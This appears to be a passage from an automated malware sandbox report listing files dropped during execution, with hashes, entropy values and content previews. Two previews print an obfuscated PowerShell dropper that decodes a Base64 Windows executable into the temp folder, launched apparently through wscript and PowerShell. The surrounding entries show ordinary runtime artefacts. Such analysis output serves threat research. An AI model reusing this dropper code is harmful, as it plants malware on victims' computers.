                                                                                                          Preview:$FASFASFASFJASASGGASGHASASASGHASYTYTYQWETTUQW=[IO.Path]::Combine($env:TEMP,"JXCJKXCJHKJHXCJHKXCXCJHK.exe")..[IO.File]::WriteAllBytes($FASFASFASFJASASGGASGHASASASGHASYTYTYQWETTUQW,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADf8vGcAAAAAAAAAAOAADgELATAAAPYFAAD8BQAAAAAAghQGAAAgAAAAIAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgBgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACgUBgBXAAAAAEAGAKgFAAAAAAAAAAAAAAAAAAAAAAAAACAGAAwAAAB44wUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAiPQFAAAgAAAA9gUAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAIAYAAAIAAAD4BQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACoBQAAAEAGAAAGAAAA+gUAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABkFAYAAAAAAEgAAAACAAUA7OMFADwwAAADAAAABAAABtA1AACorQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIA
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe
                                                                                                          File Type:CSV text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):226
                                                                                                          Entropy (8bit):5.360398796477698
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                          MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                          File Type:ASCII text, with very long lines (65428), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):524560
                                                                                                          Entropy (8bit):5.993156572464636
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:2FT1LRcHcaR+mijUI/3lcNfQki/4YgqztwvP4jNJkara5HVWAYdoa4wAE38zKwU6:iJLYPAm2XvI8Pk5hYGa4wA00svwSDBk
                                                                                                          MD5:C7AB7996E73BD6FAB0B74517DF68B1E9
                                                                                                          SHA1:A2A342A9806525F5C16CD35A3D3291B9145EB64E
                                                                                                          SHA-256:073CA831F76EC5DE04073E71D5DC0B05E24324F89441A317311C7B8BE34939CF
                                                                                                          SHA-512:E81569DBC2CFDD13356F8991C13521AE85DAB2E245E4EF1AB48D50A4DC1E76874405081A627DAE631F6308FF488B5A6A2F5379E25BA9C3A71E4BE65373484B8E
                                                                                                          Malicious:false
                                                                                                          Preview:$FASFASFASFJASASGGASGHASASASGHASYTYTYQWETTUQW=[IO.Path]::Combine($env:TEMP,"JXCJKXCJHKJHXCJHKXCXCJHK.exe")..[IO.File]::WriteAllBytes($FASFASFASFJASASGGASGHASASASGHASYTYTYQWETTUQW,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADf8vGcAAAAAAAAAAOAADgELATAAAPYFAAD8BQAAAAAAghQGAAAgAAAAIAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgBgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACgUBgBXAAAAAEAGAKgFAAAAAAAAAAAAAAAAAAAAAAAAACAGAAwAAAB44wUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAiPQFAAAgAAAA9gUAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAIAYAAAIAAAD4BQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACoBQAAAEAGAAAGAAAA+gUAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABkFAYAAAAAAEgAAAACAAUA7OMFADwwAAADAAAABAAABtA1AACorQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIA
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                          Malicious:false
                                                                                                          Preview:@...e................................................@..........
                                                                                                          Process:C:\Windows\SysWOW64\runonce.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                          Category:dropped
                                                                                                          Size (bytes):114688
                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4.....................................................................................................................................................